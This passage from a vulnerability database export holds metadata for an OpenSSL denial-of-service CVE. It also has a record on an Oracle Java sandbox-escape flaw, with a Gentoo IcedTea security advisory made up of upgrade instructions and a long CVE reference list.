"https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3185" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3194" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1833" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5420" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2012-1148" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5419" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4447" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-7141" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0799" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.6" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu9.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.22" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3731" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.39" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7056" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7055" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2177" }, { "db": "BID", "id": "91319" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "PACKETSTORM", "id": "140717" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "143628" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2177" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2177" }, { "db": "BID", "id": "91319" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "PACKETSTORM", "id": "140717" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "143628" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2177" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-20T00:00:00", "db": "VULMON", "id": "CVE-2016-2177" }, { "date": "2016-05-05T00:00:00", "db": "BID", "id": "91319" }, { "date": "2016-06-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "date": "2017-01-25T21:53:32", "db": "PACKETSTORM", "id": "140717" }, { "date": "2017-06-28T22:12:00", "db": "PACKETSTORM", "id": "143176" }, { "date": "2017-06-28T22:37:00", "db": "PACKETSTORM", "id": "143181" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2017-08-03T04:28:16", "db": "PACKETSTORM", "id": "143628" }, { "date": "2016-12-16T16:34:49", "db": "PACKETSTORM", "id": "140182" }, { "date": "2017-02-01T00:36:45", "db": "PACKETSTORM", "id": "140850" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-06-20T01:59:02.087000", "db": "NVD", "id": "CVE-2016-2177" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2177" }, { "date": "2018-02-05T14:00:00", "db": "BID", "id": "91319" }, { "date": "2019-07-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "date": "2023-11-07T02:31:01.273000", "db": "NVD", "id": "CVE-2016-2177" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "91319" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003304" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Boundary Condition Error", "sources": [ { "db": "BID", "id": "91319" } ], "trust": 0.3 } }
var-201404-0378
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 5.0u61, SE 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within ScriptEngineManager. With the usage of this class, it is possible to disable the security manager and run code as privileged. This allows a malicious applet to execute attacker-supplied code resulting in remote code execution under the context of the current user. The vulnerability can be exploited over multiple protocols. This issue affects the 'Libraries' sub-component. Failed exploit attempts will result in a denial-of-service condition. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201406-32
http://security.gentoo.org/
Severity: High Title: IcedTea JDK: Multiple vulnerabilities Date: June 29, 2014 Bugs: #312297, #330205, #340819, #346799, #352035, #353418, #354231, #355127, #370787, #387637, #404095, #421031, #429522, #433389, #438750, #442478, #457206, #458410, #461714, #466822, #477210, #489570, #508270 ID: 201406-32
Synopsis
Multiple vulnerabilities have been found in the IcedTea JDK, the worst of which could lead to arbitrary code execution.
Background
IcedTea is a distribution of the Java OpenJDK source code built with free build tools.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
Multiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
[ 1 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 2 ] CVE-2010-2548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548 [ 3 ] CVE-2010-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783 [ 4 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 5 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 6 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 7 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 8 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 9 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 10 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 11 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 12 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 13 ] CVE-2010-3564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564 [ 14 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 15 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 16 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 17 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 18 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 19 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 20 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 21 ] CVE-2010-3860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860 [ 22 ] CVE-2010-4351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351 [ 23 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 24 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 25 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 26 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 27 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 28 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 29 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 30 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 31 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 32 ] CVE-2011-0025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025 [ 33 ] CVE-2011-0706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706 [ 34 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 35 ] CVE-2011-0822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822 [ 36 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 37 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 38 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 39 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 40 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 41 ] CVE-2011-0870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870 [ 42 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 43 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 44 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 45 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 46 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 47 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 48 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 49 ] CVE-2011-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 50 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 51 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 52 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 53 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 54 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 55 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 56 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 57 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 58 ] CVE-2011-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571 [ 59 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 60 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 61 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 62 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 63 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 64 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 65 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 66 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 67 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 68 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 69 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 70 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 71 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 72 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 73 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 74 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 75 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 76 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 77 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 78 ] CVE-2012-3422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422 [ 79 ] CVE-2012-3423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423 [ 80 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 81 ] CVE-2012-4540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540 [ 82 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 83 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 84 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 85 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 86 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 87 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 88 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 89 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 90 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 91 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 92 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 93 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 94 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 95 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 96 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 97 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 98 ] CVE-2012-5979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979 [ 99 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 100 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 101 ] CVE-2013-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424 [ 102 ] CVE-2013-0425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425 [ 103 ] CVE-2013-0426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426 [ 104 ] CVE-2013-0427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427 [ 105 ] CVE-2013-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428 [ 106 ] CVE-2013-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429 [ 107 ] CVE-2013-0431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431 [ 108 ] CVE-2013-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432 [ 109 ] CVE-2013-0433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433 [ 110 ] CVE-2013-0434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434 [ 111 ] CVE-2013-0435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435 [ 112 ] CVE-2013-0440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440 [ 113 ] CVE-2013-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441 [ 114 ] CVE-2013-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442 [ 115 ] CVE-2013-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443 [ 116 ] CVE-2013-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444 [ 117 ] CVE-2013-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450 [ 118 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 119 ] CVE-2013-1475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475 [ 120 ] CVE-2013-1476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476 [ 121 ] CVE-2013-1478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478 [ 122 ] CVE-2013-1480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480 [ 123 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 124 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 125 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 126 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 127 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 128 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 129 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 130 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 131 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 132 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 133 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 134 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 135 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 136 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 137 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 138 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 139 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 140 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 141 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 142 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 143 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 144 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 145 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 146 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 147 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 148 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 149 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 150 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 151 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 152 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 153 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 154 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 155 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 156 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 157 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 158 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 159 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 160 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 161 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 162 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 163 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 164 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 165 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 166 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 167 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 168 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 169 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 170 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 171 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 172 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 173 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 174 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 175 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 176 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 177 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 178 ] CVE-2013-4002 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4002 [ 179 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 180 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 181 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 182 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 183 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 184 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 185 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 186 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 187 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 188 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 189 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 190 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 191 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 192 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 193 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 194 ] CVE-2013-5809 